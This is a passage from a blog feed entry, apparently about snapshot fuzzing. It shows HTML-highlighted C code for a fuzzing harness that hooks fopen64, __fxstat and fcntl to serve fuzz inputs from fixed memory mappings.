        <span class="n">ret</span> <span class="o">=</span> <span class="n">fmemopen</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
        
        <span class="c1">// Make sure we've never fopen()'d our fuzzing target before</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">faked_fp</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"** Attempting to fopen64() fuzzing target more than once</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Update faked_fp</span>
        <span class="n">faked_fp</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span>

        <span class="c1">// Change the filedes to something we know</span>
        <span class="n">ret</span><span class="o">-&gt;</span><span class="n">_fileno</span> <span class="o">=</span> <span class="mi">1337</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// We're not opening our file, send to regular fopen</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_fopen64</span><span class="p">(</span><span class="n">pathname</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Return FILE stream ptr to caller</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for __fxstat</span>
<span class="kt">int</span> <span class="nf">__fxstat</span> <span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real fxstat</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fxstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fxstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__fxstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Check to see if we're stat'ing our fuzz target</span>
    <span class="k">if</span> <span class="p">(</span><span class="mi">1337</span> <span class="o">==</span> <span class="n">__filedesc</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch the global struct with current input size</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Copy global stat struct back to caller</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Normal stat, send to real fxstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_fxstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for fcntl</span>
<span class="kt">int</span> <span class="nf">fcntl</span><span class="p">(</span><span class="kt">int</span> <span class="n">fildes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="p">...)</span> <span class="p">{</span>
    <span class="c1">// Resolve fcntl symbol if needed</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fcntl</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fcntl</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"fcntl"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">fildes</span> <span class="o">==</span> <span class="mi">1337</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">O_RDONLY</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** fcntl() called for real file descriptor</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Map memory to hold our inputs in memory and information about their size</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_create_mem_mappings</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="c1">// Map the page to hold the input size</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_SZ_ADDR</span><span class="p">),</span>
        <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Err mapping INPUT_SZ_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let's actually initialize the value at the input size location as well</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Map the pages to hold the input contents</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_ADDR</span><span class="p">),</span>
        <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">MAX_INPUT_SZ</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Err mapping INPUT_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init the value</span>
    <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Create a "legit" stat struct globally to pass to callers</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_setup_stat_struct</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="n">__xstat</span><span class="p">(</span><span class="mh">0x1337</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Err creating stat struct for '%s' during load</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Used for testing, load /bin/ed into the input buffer and update its size info</span>
<span class="cp">#ifdef TEST
</span><span class="k">static</span> <span class="kt">void</span> <span class="nf">_test_func</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>    
    <span class="c1">// Open TEST_FILE for reading</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">TEST_FILE</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Failed to open '%s' during test</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">TEST_FILE</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Attempt to read max input buf size</span>
    <span class="kt">ssize_t</span> <span class="n">bytes</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>

    <span class="c1">// Update the input size</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">bytes</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#endif
</span>
<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create memory mappings to hold our input and information about its size</span>
    <span class="n">_create_mem_mappings</span><span class="p">();</span>

    <span class="c1">// Setup global "legit" stat struct</span>
    <span class="n">_setup_stat_struct</span><span class="p">();</span>

    <span class="c1">// If we're testing, load /bin/ed up into our input buffer and update size</span>
<span class="cp">#ifdef TEST
</span>    <span class="n">_test_func</span><span class="p">();</span>
<span class="cp">#endif
</span><span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="fuzzing" /><category term="harnessing" /><category term="snapshot_fuzzing" /><summary type="html"><![CDATA[Introduction It’s been a while since I’ve done one of these, and one of my goals this year is to do more so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free-time to do my own research and blog again. Looking forward to sharing more and more this year.]]></summary></entry></feed>